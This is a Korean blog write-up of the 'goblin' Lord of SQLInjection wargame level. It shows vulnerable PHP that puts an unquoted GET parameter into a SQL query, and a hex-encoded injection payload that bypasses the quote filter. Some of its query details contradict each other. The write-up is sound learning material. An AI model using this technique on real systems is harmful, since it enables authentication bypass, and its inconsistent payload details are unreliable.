[LOS] goblin 풀이

 

PHP & query 

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'|\"|\`/i', $_GET[no])) exit("No Quotes ~_~"); 
  $query = "select id from prob_goblin where id='guest' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve("goblin");
  highlight_file(__FILE__); 
?>
select id from prob_goblin where id='guest' and no=

 

문제 풀이

더보기

solve 조건

 if($result['id'] == 'admin') solve("goblin");

 id가 admin이면 해결된다.

 

특수문자 제약

 if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
 if(preg_match('/\'|\"|\`/i', $_GET[no])) exit("No Quotes ~_~"); 

 쿼터 문자들을 필터링한다. 

 쿼터문자들을 우회하여 인증을 하는 문제이다.

 

 

sqlInjection 쿼리

select id from prob_gremlin where id='' and pw='' or true #'

 형태로 공격을 시도 할 것이다.

 해당 php는 get형식으로 쿼리를 받고있어 sql 인젝션이 가능하다.

 no는 숫자이기 때문에 싱글쿼터를 쓰지 않는다. 이를 용하여 문제를 해결한다. admin [0x아스키코드]로 숫자화 하여 표현한다.

 

admin=0x61646d696e

 

 

URL

?no=-1 or admin=0x61646d696e

 

 

Injection 결과

select id from prob_goblin where id='guest' and no=123 or id=0x61646d696e

 

 

 

 

 

 

 

'CTF > LOS' 카테고리의 다른 글

[LOS] darkelf 풀이 - 6번  (0) 2020.09.15
[LOS] wolfman 풀이 - 5번  (0) 2020.09.15
[LOS] orc 풀이 - 4번  (0) 2020.09.15
[LOS] cobolt 풀이 - 2번  (0) 2020.09.15
[LOS] gremlin 풀이 - 1번  (0) 2020.09.15

+ Recent posts